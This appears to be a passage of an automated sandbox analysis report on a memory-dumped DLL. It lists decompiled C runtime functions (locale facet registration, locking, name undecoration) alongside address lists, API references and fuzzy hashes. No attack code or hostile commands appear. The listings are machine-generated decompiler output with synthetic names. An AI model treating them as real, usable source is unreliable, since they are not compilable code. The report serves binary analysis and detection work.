								_t30 = _a4;
								_t30[1] = _t30[1] & 0x00000000;
								 *_t30 =  *_t30 & 0x00000000;
								_t30[1] = 2;
								return _t30;
							}
						}
					}
				}
			}

0x6e1e736f
0x6e1e7374
0x6e1e737a
0x6e1e737e
0x6e1e73d3
0x00000000
0x6e1e7380
0x6e1e7384
0x6e1e738a
0x6e1e738d
0x6e1e73c7
0x00000000
0x6e1e738f
0x6e1e7390
0x6e1e7393
0x6e1e73b8
0x00000000
0x6e1e7395
0x6e1e7398
0x6e1e73d8
0x6e1e73e0
0x6e1e73e5
0x6e1e73eb
0x6e1e73f0
0x6e1e73f4
0x6e1e739a
0x6e1e739a
0x6e1e739d
0x6e1e73a1
0x6e1e73a4
0x6e1e73a9
0x6e1e73a9
0x6e1e7398
0x6e1e7393
0x6e1e738d

APIs

UnDecorator::UScore.LIBVCRUNTIME ref: 6E1E7365
DName::DName.LIBVCRUNTIME ref: 6E1E736F

Part of subcall function 6E1E5A6C: DName::doPchar.LIBVCRUNTIME ref: 6E1E5A93

DName::operator+=.LIBVCRUNTIME ref: 6E1E73B8
DName::operator+=.LIBCMT ref: 6E1E73C7
DName::operator+=.LIBCMT ref: 6E1E73D3
DName::operator+=.LIBCMT ref: 6E1E73E0

Strings

void, xrefs: 6E1E73BF

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+=$Decorator::NameName::Name::doPcharScore
String ID: void
API String ID: 1092095640-3531332078
Opcode ID: f7aa1f6f7398ff860fcc770e1fa39631cbc85661def870b0145f1878fface020
Instruction ID: d23b0e2fa7685e50a75578c9c2f7d36d7cf21ae121ca0c8a6feff6521c6ba11d
Opcode Fuzzy Hash: f7aa1f6f7398ff860fcc770e1fa39631cbc85661def870b0145f1878fface020
Instruction Fuzzy Hash: FE11A531900A089FDB49DFE4C455BEDBB78AB51308F504499F8019BAD2DB70AAC5DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF375, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF375(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t223;
				signed int _t224;
				void* _t236;
				void* _t249;
				void* _t262;
				void* _t275;
				void* _t288;
				void* _t301;
				void* _t314;
				void* _t327;
				void* _t340;
				void* _t353;
				void* _t366;
				void* _t379;
				void* _t392;
				void* _t405;
				signed int _t587;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				void* _t682;

				_t633 = __edx;
				_t482 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t682 - 0x14, 0);
				_t651 =  *0x6e286dbc; // 0x0
				 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
				 *(_t682 - 0x10) = _t651;
				_t223 = E6E1A161C(0x6e286d70);
				_t485 =  *((intOrPtr*)(_t682 + 8));
				_t224 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t223);
				_t635 = _t224;
				if(_t224 != 0) {
					L5:
					E6E1C66BA(_t682 - 0x14);
					return E6E1E0075(_t635);
				} else {
					if(_t651 == 0) {
						_push( *((intOrPtr*)(_t682 + 8)));
						_push(_t682 - 0x10);
						__eflags = E6E1D0FEF(__ebx, _t485, __edx, _t635, _t651) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t682 - 0x20);
							E6E1E3D74(_t682 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t635, _t651, 0x14);
							E6E1C6653(_t682 - 0x14, 0);
							_t652 =  *0x6e286df0; // 0x0
							 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
							 *(_t682 - 0x10) = _t652;
							_t236 = E6E1A161C(0x6e286d9c);
							_t492 =  *((intOrPtr*)(_t682 + 8));
							_t636 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t236);
							__eflags = _t636;
							if(_t636 != 0) {
								L12:
								E6E1C66BA(_t682 - 0x14);
								return E6E1E0075(_t636);
							} else {
								__eflags = _t652;
								if(_t652 == 0) {
									_push( *((intOrPtr*)(_t682 + 8)));
									_push(_t682 - 0x10);
									__eflags = E6E1D1057(_t482, _t492, __edx, _t636, _t652) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t682 - 0x20);
										E6E1E3D74(_t682 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t482, _t636, _t652, 0x14);
										E6E1C6653(_t682 - 0x14, 0);
										_t653 =  *0x6e286dc0; // 0x0
										 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
										 *(_t682 - 0x10) = _t653;
										_t249 = E6E1A161C(0x6e286d74);
										_t499 =  *((intOrPtr*)(_t682 + 8));
										_t637 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t249);
										__eflags = _t637;
										if(_t637 != 0) {
											L19:
											E6E1C66BA(_t682 - 0x14);
											return E6E1E0075(_t637);
										} else {
											__eflags = _t653;
											if(_t653 == 0) {
												_push( *((intOrPtr*)(_t682 + 8)));
												_push(_t682 - 0x10);
												__eflags = E6E1D10BF(_t482, _t499, __edx, _t637, _t653) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t682 - 0x20);
													E6E1E3D74(_t682 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t482, _t637, _t653, 0x14);
													E6E1C6653(_t682 - 0x14, 0);
													_t654 =  *0x6e286df8; // 0x0
													 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
													 *(_t682 - 0x10) = _t654;
													_t262 = E6E1A161C(0x6e286da4);
													_t506 =  *((intOrPtr*)(_t682 + 8));
													_t638 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t262);
													__eflags = _t638;
													if(_t638 != 0) {
														L26:
														E6E1C66BA(_t682 - 0x14);
														return E6E1E0075(_t638);
													} else {
														__eflags = _t654;
														if(_t654 == 0) {
															_push( *((intOrPtr*)(_t682 + 8)));
															_push(_t682 - 0x10);
															__eflags = E6E1D1127(_t482, _t506, _t633, _t638, _t654) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t682 - 0x20);
																E6E1E3D74(_t682 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t482, _t638, _t654, 0x14);
																E6E1C6653(_t682 - 0x14, 0);
																_t655 =  *0x6e286df4; // 0x0
																 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																 *(_t682 - 0x10) = _t655;
																_t275 = E6E1A161C(0x6e286da0);
																_t513 =  *((intOrPtr*)(_t682 + 8));
																_t639 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t275);
																__eflags = _t639;
																if(_t639 != 0) {
																	L33:
																	E6E1C66BA(_t682 - 0x14);
																	return E6E1E0075(_t639);
																} else {
																	__eflags = _t655;
																	if(_t655 == 0) {
																		_push( *((intOrPtr*)(_t682 + 8)));
																		_push(_t682 - 0x10);
																		__eflags = E6E1D11AB(_t482, _t513, _t633, _t639, _t655) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t682 - 0x20);
																			E6E1E3D74(_t682 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t482, _t639, _t655, 0x14);
																			E6E1C6653(_t682 - 0x14, 0);
																			_t656 =  *0x6e286dc8; // 0x0
																			 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																			 *(_t682 - 0x10) = _t656;
																			_t288 = E6E1A161C(0x6e286d7c);
																			_t520 =  *((intOrPtr*)(_t682 + 8));
																			_t640 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t288);
																			__eflags = _t640;
																			if(_t640 != 0) {
																				L40:
																				E6E1C66BA(_t682 - 0x14);
																				return E6E1E0075(_t640);
																			} else {
																				__eflags = _t656;
																				if(_t656 == 0) {
																					_push( *((intOrPtr*)(_t682 + 8)));
																					_push(_t682 - 0x10);
																					__eflags = E6E1D1230(_t482, _t520, _t633, _t640, _t656) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t682 - 0x20);
																						E6E1E3D74(_t682 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t482, _t640, _t656, 0x14);
																						E6E1C6653(_t682 - 0x14, 0);
																						_t657 =  *0x6e286dc4; // 0x0
																						 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																						 *(_t682 - 0x10) = _t657;
																						_t301 = E6E1A161C(0x6e286d78);
																						_t527 =  *((intOrPtr*)(_t682 + 8));
																						_t641 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t301);
																						__eflags = _t641;
																						if(_t641 != 0) {
																							L47:
																							E6E1C66BA(_t682 - 0x14);
																							return E6E1E0075(_t641);
																						} else {
																							__eflags = _t657;
																							if(_t657 == 0) {
																								_push( *((intOrPtr*)(_t682 + 8)));
																								_push(_t682 - 0x10);
																								__eflags = E6E1D12B4(_t482, _t527, _t633, _t641, _t657) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t682 - 0x20);
																									E6E1E3D74(_t682 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t482, _t641, _t657, 0x14);
																									E6E1C6653(_t682 - 0x14, 0);
																									_t658 =  *0x6e286dd8; // 0x0
																									 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																									 *(_t682 - 0x10) = _t658;
																									_t314 = E6E1A161C(0x6e286d84);
																									_t534 =  *((intOrPtr*)(_t682 + 8));
																									_t642 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t314);
																									__eflags = _t642;
																									if(_t642 != 0) {
																										L54:
																										E6E1C66BA(_t682 - 0x14);
																										return E6E1E0075(_t642);
																									} else {
																										__eflags = _t658;
																										if(_t658 == 0) {
																											_push( *((intOrPtr*)(_t682 + 8)));
																											_push(_t682 - 0x10);
																											__eflags = E6E1D1339(_t482, _t534, _t633, _t642, _t658) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t682 - 0x20);
																												E6E1E3D74(_t682 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t482, _t642, _t658, 0x14);
																												E6E1C6653(_t682 - 0x14, 0);
																												_t659 =  *0x6e286db0; // 0x0
																												 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																												 *(_t682 - 0x10) = _t659;
																												_t327 = E6E1A161C(0x6e286d64);
																												_t541 =  *((intOrPtr*)(_t682 + 8));
																												_t643 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t327);
																												__eflags = _t643;
																												if(_t643 != 0) {
																													L61:
																													E6E1C66BA(_t682 - 0x14);
																													return E6E1E0075(_t643);
																												} else {
																													__eflags = _t659;
																													if(_t659 == 0) {
																														_push( *((intOrPtr*)(_t682 + 8)));
																														_push(_t682 - 0x10);
																														__eflags = E6E1D13A1(_t482, _t541, _t633, _t643, _t659) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t682 - 0x20);
																															E6E1E3D74(_t682 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t482, _t643, _t659, 0x14);
																															E6E1C6653(_t682 - 0x14, 0);
																															_t660 =  *0x6e286ddc; // 0x0
																															 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																															 *(_t682 - 0x10) = _t660;
																															_t340 = E6E1A161C(0x6e286d88);
																															_t548 =  *((intOrPtr*)(_t682 + 8));
																															_t644 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t340);
																															__eflags = _t644;
																															if(_t644 != 0) {
																																L68:
																																E6E1C66BA(_t682 - 0x14);
																																return E6E1E0075(_t644);
																															} else {
																																__eflags = _t660;
																																if(_t660 == 0) {
																																	_push( *((intOrPtr*)(_t682 + 8)));
																																	_push(_t682 - 0x10);
																																	__eflags = E6E1D1409(_t482, _t548, _t633, _t644, _t660) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t682 - 0x20);
																																		E6E1E3D74(_t682 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t482, _t644, _t660, 0x14);
																																		E6E1C6653(_t682 - 0x14, 0);
																																		_t661 =  *0x6e286de0; // 0x0
																																		 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																		 *(_t682 - 0x10) = _t661;
																																		_t353 = E6E1A161C(0x6e286d8c);
																																		_t555 =  *((intOrPtr*)(_t682 + 8));
																																		_t645 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t353);
																																		__eflags = _t645;
																																		if(_t645 != 0) {
																																			L75:
																																			E6E1C66BA(_t682 - 0x14);
																																			return E6E1E0075(_t645);
																																		} else {
																																			__eflags = _t661;
																																			if(_t661 == 0) {
																																				_push( *((intOrPtr*)(_t682 + 8)));
																																				_push(_t682 - 0x10);
																																				__eflags = E6E1D1471(_t482, _t555, _t633, _t645, _t661) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t682 - 0x20);
																																					E6E1E3D74(_t682 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t482, _t645, _t661, 0x14);
																																					E6E1C6653(_t682 - 0x14, 0);
																																					_t662 =  *0x6e286dfc; // 0x0
																																					 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																					 *(_t682 - 0x10) = _t662;
																																					_t366 = E6E1A161C(0x6e286da8);
																																					_t562 =  *((intOrPtr*)(_t682 + 8));
																																					_t646 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t366);
																																					__eflags = _t646;
																																					if(_t646 != 0) {
																																						L82:
																																						E6E1C66BA(_t682 - 0x14);
																																						return E6E1E0075(_t646);
																																					} else {
																																						__eflags = _t662;
																																						if(_t662 == 0) {
																																							_push( *((intOrPtr*)(_t682 + 8)));
																																							_push(_t682 - 0x10);
																																							__eflags = E6E1D14EC(_t482, _t562, _t633, _t646, _t662) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t682 - 0x20);
																																								E6E1E3D74(_t682 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t482, _t646, _t662, 0x14);
																																								E6E1C6653(_t682 - 0x14, 0);
																																								_t663 =  *0x6e286dcc; // 0x0
																																								 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																								 *(_t682 - 0x10) = _t663;
																																								_t379 = E6E1A161C(0x6e286d80);
																																								_t569 =  *((intOrPtr*)(_t682 + 8));
																																								_t647 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t379);
																																								__eflags = _t647;
																																								if(_t647 != 0) {
																																									L89:
																																									E6E1C66BA(_t682 - 0x14);
																																									return E6E1E0075(_t647);
																																								} else {
																																									__eflags = _t663;
																																									if(_t663 == 0) {
																																										_push( *((intOrPtr*)(_t682 + 8)));
																																										_push(_t682 - 0x10);
																																										__eflags = E6E1D1558(_t482, _t569, _t633, _t647, _t663) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t682 - 0x20);
																																											E6E1E3D74(_t682 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t482, _t647, _t663, 0x14);
																																											E6E1C6653(_t682 - 0x14, 0);
																																											_t664 =  *0x6e286e00; // 0x0
																																											 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																											 *(_t682 - 0x10) = _t664;
																																											_t392 = E6E1A161C(0x6e286dac);
																																											_t576 =  *((intOrPtr*)(_t682 + 8));
																																											_t648 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t392);
																																											__eflags = _t648;
																																											if(_t648 != 0) {
																																												L96:
																																												E6E1C66BA(_t682 - 0x14);
																																												return E6E1E0075(_t648);
																																											} else {
																																												__eflags = _t664;
																																												if(_t664 == 0) {
																																													_push( *((intOrPtr*)(_t682 + 8)));
																																													_push(_t682 - 0x10);
																																													__eflags = E6E1D15C4(_t482, _t576, _t633, _t648, _t664) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t682 - 0x20);
																																														E6E1E3D74(_t682 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t482, _t648, _t664, 0x14);
																																														E6E1C6653(_t682 - 0x14, 0);
																																														_t665 =  *0x6e286dd0; // 0x0
																																														 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																														 *(_t682 - 0x10) = _t665;
																																														_t405 = E6E1A161C(0x6e286d60);
																																														_t583 =  *((intOrPtr*)(_t682 + 8));
																																														_t649 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t405);
																																														__eflags = _t649;
																																														if(_t649 != 0) {
																																															L103:
																																															E6E1C66BA(_t682 - 0x14);
																																															return E6E1E0075(_t649);
																																														} else {
																																															__eflags = _t665;
																																															if(_t665 == 0) {
																																																_push( *((intOrPtr*)(_t682 + 8)));
																																																_push(_t682 - 0x10);
																																																__eflags = E6E1D162A(_t482, _t583, _t633, _t649, _t665) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	_t587 = _t682 - 0x20;
																																																	E6E1A1438(_t587);
																																																	E6E1E3D74(_t682 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e22851f, _t482, _t649, _t665, 4);
																																																	_t666 = _t587;
																																																	 *(_t682 - 0x10) = _t666;
																																																	 *((intOrPtr*)(_t666 + 4)) =  *((intOrPtr*)(_t682 + 0xc));
																																																	_push( *((intOrPtr*)(_t682 + 0x14)));
																																																	_t217 = _t682 - 4;
																																																	 *_t217 =  *(_t682 - 4) & 0x00000000;
																																																	__eflags =  *_t217;
																																																	 *_t666 = 0x6e22c0c4;
																																																	 *((char*)(_t666 + 0x28)) =  *((intOrPtr*)(_t682 + 0x10));
																																																	E6E1D542F(_t482, _t587, _t633, _t649, _t666,  *_t217);
																																																	return E6E1E0075(_t666,  *((intOrPtr*)(_t682 + 8)));
																																																} else {
																																																	_t649 =  *(_t682 - 0x10);
																																																	 *(_t682 - 0x10) = _t649;
																																																	 *(_t682 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t649);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t649 + 4))))();
																																																	 *0x6e286dd0 = _t649;
																																																	goto L103;
																																																}
																																															} else {
																																																_t649 = _t665;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t648 =  *(_t682 - 0x10);
																																														 *(_t682 - 0x10) = _t648;
																																														 *(_t682 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t648);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t648 + 4))))();
																																														 *0x6e286e00 = _t648;
																																														goto L96;
																																													}
																																												} else {
																																													_t648 = _t664;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t647 =  *(_t682 - 0x10);
																																											 *(_t682 - 0x10) = _t647;
																																											 *(_t682 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t647);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t647 + 4))))();
																																											 *0x6e286dcc = _t647;
																																											goto L89;
																																										}
																																									} else {
																																										_t647 = _t663;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t646 =  *(_t682 - 0x10);
																																								 *(_t682 - 0x10) = _t646;
																																								 *(_t682 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t646);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t646 + 4))))();
																																								 *0x6e286dfc = _t646;
																																								goto L82;
																																							}
																																						} else {
																																							_t646 = _t662;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t645 =  *(_t682 - 0x10);
																																					 *(_t682 - 0x10) = _t645;
																																					 *(_t682 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t645);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t645 + 4))))();
																																					 *0x6e286de0 = _t645;
																																					goto L75;
																																				}
																																			} else {
																																				_t645 = _t661;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t644 =  *(_t682 - 0x10);
																																		 *(_t682 - 0x10) = _t644;
																																		 *(_t682 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t644);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t644 + 4))))();
																																		 *0x6e286ddc = _t644;
																																		goto L68;
																																	}
																																} else {
																																	_t644 = _t660;
																																	goto L68;
																																}
																															}
																														} else {
																															_t643 =  *(_t682 - 0x10);
																															 *(_t682 - 0x10) = _t643;
																															 *(_t682 - 4) = 1;
																															E6E1C6FD3(__eflags, _t643);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t643 + 4))))();
																															 *0x6e286db0 = _t643;
																															goto L61;
																														}
																													} else {
																														_t643 = _t659;
																														goto L61;
																													}
																												}
																											} else {
																												_t642 =  *(_t682 - 0x10);
																												 *(_t682 - 0x10) = _t642;
																												 *(_t682 - 4) = 1;
																												E6E1C6FD3(__eflags, _t642);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t642 + 4))))();
																												 *0x6e286dd8 = _t642;
																												goto L54;
																											}
																										} else {
																											_t642 = _t658;
																											goto L54;
																										}
																									}
																								} else {
																									_t641 =  *(_t682 - 0x10);
																									 *(_t682 - 0x10) = _t641;
																									 *(_t682 - 4) = 1;
																									E6E1C6FD3(__eflags, _t641);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t641 + 4))))();
																									 *0x6e286dc4 = _t641;
																									goto L47;
																								}
																							} else {
																								_t641 = _t657;
																								goto L47;
																							}
																						}
																					} else {
																						_t640 =  *(_t682 - 0x10);
																						 *(_t682 - 0x10) = _t640;
																						 *(_t682 - 4) = 1;
																						E6E1C6FD3(__eflags, _t640);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t640 + 4))))();
																						 *0x6e286dc8 = _t640;
																						goto L40;
																					}
																				} else {
																					_t640 = _t656;
																					goto L40;
																				}
																			}
																		} else {
																			_t639 =  *(_t682 - 0x10);
																			 *(_t682 - 0x10) = _t639;
																			 *(_t682 - 4) = 1;
																			E6E1C6FD3(__eflags, _t639);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t639 + 4))))();
																			 *0x6e286df4 = _t639;
																			goto L33;
																		}
																	} else {
																		_t639 = _t655;
																		goto L33;
																	}
																}
															} else {
																_t638 =  *(_t682 - 0x10);
																 *(_t682 - 0x10) = _t638;
																 *(_t682 - 4) = 1;
																E6E1C6FD3(__eflags, _t638);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t638 + 4))))();
																 *0x6e286df8 = _t638;
																goto L26;
															}
														} else {
															_t638 = _t654;
															goto L26;
														}
													}
												} else {
													_t637 =  *(_t682 - 0x10);
													 *(_t682 - 0x10) = _t637;
													 *(_t682 - 4) = 1;
													E6E1C6FD3(__eflags, _t637);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t637 + 4))))();
													 *0x6e286dc0 = _t637;
													goto L19;
												}
											} else {
												_t637 = _t653;
												goto L19;
											}
										}
									} else {
										_t636 =  *(_t682 - 0x10);
										 *(_t682 - 0x10) = _t636;
										 *(_t682 - 4) = 1;
										E6E1C6FD3(__eflags, _t636);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t636 + 4))))();
										 *0x6e286df0 = _t636;
										goto L12;
									}
								} else {
									_t636 = _t652;
									goto L12;
								}
							}
						} else {
							_t635 =  *(_t682 - 0x10);
							 *(_t682 - 0x10) = _t635;
							 *(_t682 - 4) = 1;
							E6E1C6FD3(__eflags, _t635);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t635 + 4))))();
							 *0x6e286dbc = _t635;
							goto L5;
						}
					} else {
						_t635 = _t651;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF37C
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF386
int.LIBCPMT ref: 6E1CF39D

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF3D7
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF3F7
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF415

Strings

pm(n, xrefs: 6E1CF391

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: pm(n
API String ID: 651022567-4246979846
Opcode ID: 435cb87e69ab4875017fb59220c966b1ec2d0b33d00b00658b6448439bfc64fd
Instruction ID: a133a39583de3a20a79a042813344a1cb77d975f4a44bc8088a2d49963d4b37b
Opcode Fuzzy Hash: 435cb87e69ab4875017fb59220c966b1ec2d0b33d00b00658b6448439bfc64fd
Instruction Fuzzy Hash: E6115C7591051DDBCF01DBE4C854AFEB37ABF64B14F240809D420E7290DF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4A80, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1C4A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t57;
				intOrPtr* _t60;
				void* _t61;

				_t44 = __ebx;
				E6E1E00AC(0x6e228144, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t61 - 0x14, 0);
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				_t57 =  *0x6e29ce80; // 0x35a25a0
				 *((intOrPtr*)(_t61 - 0x10)) = _t57;
				_t23 = E6E1A161C(0x6e286b34);
				_t47 =  *((intOrPtr*)(_t61 + 8));
				_t24 = E6E1A171B( *((intOrPtr*)(_t61 + 8)), _t23);
				_t59 = _t24;
				if(_t24 != 0) {
					L5:
					E6E1C66BA(_t61 - 0x14);
					return E6E1E0075(_t59);
				} else {
					if(_t57 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10);
						__eflags = E6E1A18A0(__ebx, _t47, __edx, _t57, _t59) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t61 - 0x20);
							E6E1E3D74(_t61 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e228192, __ebx, _t57, _t59, 0xc);
							_t60 = E6E1C4A32(_t44, _t57, _t59, 8);
							 *((intOrPtr*)(_t61 - 0x18)) = _t61 - 0xd;
							 *((intOrPtr*)(_t61 - 0x14)) = _t60;
							__eflags = 0;
							 *(_t61 - 4) = 0;
							 *_t60 = 0;
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *_t60 = E6E1C5BFB();
							return E6E1E0075(_t60);
						} else {
							_t59 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *(_t61 - 4) = 1;
							E6E1C6FD3(__eflags, _t59);
							 *((intOrPtr*)( *_t59 + 4))();
							 *0x6e29ce80 = _t59;
							goto L5;
						}
					} else {
						_t59 = _t57;
						goto L5;
					}
				}
			}

0x6e1c4a80
0x6e1c4a87
0x6e1c4a91
0x6e1c4a96
0x6e1c4a9f
0x6e1c4aa5
0x6e1c4aa8
0x6e1c4aad
0x6e1c4ab1
0x6e1c4ab6
0x6e1c4aba
0x6e1c4af5
0x6e1c4af8
0x6e1c4b04
0x6e1c4abc
0x6e1c4abe
0x6e1c4ac4
0x6e1c4aca
0x6e1c4ad2
0x6e1c4ad5
0x6e1c4b08
0x6e1c4b16
0x6e1c4b1b
0x6e1c4b23
0x6e1c4b2f
0x6e1c4b35
0x6e1c4b38
0x6e1c4b3b
0x6e1c4b3d
0x6e1c4b40
0x6e1c4b42
